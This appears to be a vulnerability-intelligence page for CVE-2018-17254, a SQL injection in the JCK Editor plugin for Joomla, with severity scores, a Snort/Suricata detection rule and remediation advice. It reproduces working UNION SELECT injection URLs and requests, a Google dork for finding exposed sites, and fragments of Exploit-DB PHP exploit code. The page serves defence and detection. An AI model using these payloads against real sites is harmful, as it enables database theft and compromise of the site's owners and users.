CVE-2018-17254
published 2018-09-20CVE-2018-17254: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
82.98%
99.6th percentile
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arkextensions | jck_editor | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa↗
commandGET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1↗
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)"; flow:established,to_server; http.method; content:"GET"; nocase; http.uri; content:"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"; nocase; content:"extension=menu"; distance:0; content:"view=menu"; nocase; content:"parent="; nocase; pcre:"/parent=[^&]*(?:S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/|EXEC)/Ui"; reference:url,www.exploit-db.com/exploits/49627; reference:cve,2018-17254; classtype:attempted-admin; sid:2033604; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_07_28, cve CVE_2018_17254, deployment Perimeter, confidence High, signature_severity Major, tag Exploit, updated_at 2021_07_28;)
- →Google dork can be used to identify exposed vulnerable endpoints on the internet ↗
- →Exploit checks for successful injection by injecting hex-encoded string 0x6861636b6564 ('hacked') and verifying the base64-encoded response equals 'aGFja2Vk' ↗
- →RCE shell upload attempts write a randomly-named .php file to common web roots via SQL INTO OUTFILE; detect unexpected .php file creation under web root paths ↗
- →Nuclei template detection: match md5 hash of a known numeric value in HTTP response body to confirm blind UNION-based SQLi success ↗
- →ET EXPLOIT Snort SID 2033604 fires on GET requests to the vulnerable path with SQL keywords in the parent parameter; deploy at perimeter
- ·The RCE via INTO OUTFILE will likely fail unless the MySQL user has FILE privilege and the web root is writable; the exploit itself notes this ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-fhwf-3vmf-vx8q: The JCK Editor component 6
ghsa_unreviewed·2022-05-13
CVE-2018-17254 [CRITICAL] CWE-89 GHSA-fhwf-3vmf-vx8q: The JCK Editor component 6
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
VulnCheck
arkextensions jck_editor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-17254 [CRITICAL] arkextensions jck_editor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
arkextensions jck_editor Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Affected: arkextensions jck_editor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://viz.greynoise.io/tags/jck-editor-sql-injection-cve-2018-17254-sqli-attempt
Exploit PoC: https://vulncheck.com/xdb/8ed7b2c9bb2a; https://vulncheck.com/xdb/5bb757ccb3aa
Suricata
ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)
suricata·2021-07-28·CVSS 9.8
CVE-2018-17254 [CRITICAL] ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)
ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT JCK Editor 6.4.4 SQLi Attempt (CVE-2018-17254)"; flow:established,to_server; http.method; content:"GET"; nocase; http.uri; content:"/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"; nocase; content:"extension=menu"; distance:0; content:"view=menu"; nocase; content:"parent="; nocase; pcre:"/parent=[^&]*(?:S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\/\*.+\*\/|EXEC)/Ui"; reference:url,www.exploit-db.com/exploits/49627; reference:cve,2018-17254; classtype:attempted-admin; sid:2033604; rev:1; metadata:attack_target Client_Endpoint, created_at 2021_07_28,
Exploit-DB
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
exploitdb·2021-03-08·CVSS 9.8
CVE-2018-17254 [CRITICAL] Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
---
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Date: 05/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
/', $request, $output);
return $output;
}
######
function is_vulnerable($url){
global $vuln_file;
$output = inject($url, payload("0x6861636b6564"));
if(isset($output[1][0])){
if(base64_encode($output[1][0])
Exploit-DB
Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection
exploitdb·2018-09-17
CVE-2018-17254 Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection
Joomla! Component JCK Editor 6.4.4 - 'parent' SQL Injection
---
# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A
# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:
Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
Nuclei
Joomla! JCK Editor SQL Injection
nuclei·CVSS 9.8
CVE-2018-17254 [CRITICAL] Joomla! JCK Editor SQL Injection
Joomla! JCK Editor SQL Injection
The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
Template:
id: CVE-2018-17254
info:
name: Joomla! JCK Editor SQL Injection
author: Suman_Kar
severity: critical
description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
remediation: Update or remove the affected plugin.
reference:
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
- https://git
2018-09-20
Published
Exploited in the wild